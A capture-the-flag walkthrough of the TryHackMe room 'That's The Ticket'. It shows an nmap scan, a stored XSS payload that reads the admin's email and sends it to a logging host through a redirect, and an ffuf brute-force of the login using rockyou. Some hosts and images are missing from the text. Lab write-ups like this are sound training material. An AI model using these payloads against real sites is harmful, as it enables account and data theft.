This is a write-up/walkthrough of the room That’s The Ticket from TryHackMe.

Nmap Scan

First of all, we will do an Nmap scan

~ nmap -sC -sV -oN initial.nmap $IP

We get the following results Nmap Scan


If we visit the website we see the following: Ticket Manager

Click on register and create an account.

We then get taken to this dashboard: Dashboard

We can try basic XSS in the ticket input:


This works and we get the following: XSS

DNS and HTTP Logger

If we go back to TryHackMe, we see that it is recommending the HTTP & DNS Logging tool on HTTP and DNS Logging tool

We can now use the following XSS payload,

</textarea><img src="">

Getting the admin email

We can use the following XSS payload,

var email = document.getElementById("email").innerText;
email = email.replace("@", "aaa")
email = email.replace(".", "ooo")
document.location = "http://"+ email +""

And we will receive the following request:

Admin email

Getting the admin password

We can get the admin password by bruteforcing with ffuf.

ffuf -w /usr/share/wordlists/rockyou.txt  -d "email=<ADMINEMAIL>&password=FUZZ" -u http://$IP/login -fw 475 -H "Content-Type: application/x-www-form-urlencoded"

This will get the admin password which we can login with Admin Account

Support Ticket

We can then read ticket 1 to get the flag!

Ticket 1

And that is the room complete!